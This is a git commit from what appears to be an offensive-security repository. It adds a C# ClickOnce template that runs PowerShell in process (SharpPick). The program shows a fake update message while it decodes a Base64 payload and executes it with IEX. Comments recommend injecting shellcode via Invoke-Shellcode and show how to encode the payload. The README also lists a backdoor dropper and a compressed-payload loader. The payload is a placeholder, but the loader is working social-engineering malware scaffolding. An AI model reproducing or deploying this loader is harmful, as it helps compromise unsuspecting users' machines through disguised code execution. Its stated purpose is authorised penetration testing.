Added ClickOnce SharpPick template.

2018-02-10 16:45:32 +01:00 · 2018-02-10 16:45:32 +01:00 · c52a66f3c9
parent cc5ba84532
commit c52a66f3c9
2 changed files with 71 additions and 0 deletions
--- a/social-engineering/README.md
+++ b/social-engineering/README.md
@ -4,6 +4,8 @@

 - **`backdoor-drop.js`** - Internet Explorer - JavaScript trojan/backdoor dropper template, to be used during Penetration Testing assessments. ([gist](https://gist.github.com/mgeeky/b0aed7c1e510560db50f96604b150dac))

+- **`clickOnceSharpPickTemplate.cs`** - This is a template for **C# Console Project** containing [SharpPick](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) technique of loading Powershell code from within C# application. The ClickOnce concept is to generate a windows self-updating Application that is specially privileged ([ClickOnce](https://www.slideshare.net/NetSPI/all-you-need-is-one-a-click-once-love-story-secure360-2015))
+
 - **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX)
 . ([gist](https://gist.github.com/mgeeky/e30ceecc2082a11b99c7b24b42bd77fc))

--- a/social-engineering/clickOnceSharpPickTemplate.cs
+++ b/social-engineering/clickOnceSharpPickTemplate.cs
@ -0,0 +1,69 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.IO;
+using System.Resources;
+using System.Net;
+
+using System.Collections.ObjectModel;
+
+//
+// Use NuGet to install System.Management.Automation reference.
+//
+using System.Management.Automation;
+using System.Management.Automation.Runspaces;
+
+namespace ConsoleApplication2
+{
+    class Program
+    {
+        //
+        // This function and concept comes from PowerPick / SharpPick project by Sixdub:
+        //      https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick
+        //
+        static string RunPS(string cmd)
+        {
+            // Init stuff
+            Runspace runspace = RunspaceFactory.CreateRunspace();
+            runspace.Open();
+            RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
+            Pipeline pipeline = runspace.CreatePipeline();
+
+            // Add commands
+            pipeline.Commands.AddScript(cmd);
+
+            // Prep PS for string output and invoke
+            pipeline.Commands.Add("Out-String");
+            Collection<PSObject> results = pipeline.Invoke();
+            runspace.Close();
+
+            // Convert records to strings
+            StringBuilder stringBuilder = new StringBuilder();
+            foreach (PSObject obj in results)
+            {
+                stringBuilder.Append(obj);
+            }
+            return stringBuilder.ToString().Trim();
+        }
+
+        static void Main()
+        {
+            Console.WriteLine("Updating ClickOnce application. Please wait...");
+
+            //
+            // Here comes your Base64 encoded Powershell payload.
+			// A good example of what to stick in here is a modified Invoke-Shellcode.ps1
+			// that will spawn a process and insert there some shellcode.
+			// You can prepare Base64 UTF8 shellcode via:
+			//		PS> $text = Get-Content yourShellcode.ps1
+			//		PS> $bytes = [System.Text.Encoding]::Unicode.GetBytes($text);
+			//		PS> $encoded = [Convert]::ToBase64String($bytes);
+			//		PS> $encoded | Out-File "myEncodedShellcode.ps1"
+            //
+            String base64encodedPayload = "<INSERT HERE YOUR BASE64 ENCODED POWERSHELL PAYLOAD>";
+
+            RunPS("IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"" + base64encodedPayload + "\")))");
+        }
+    }
+}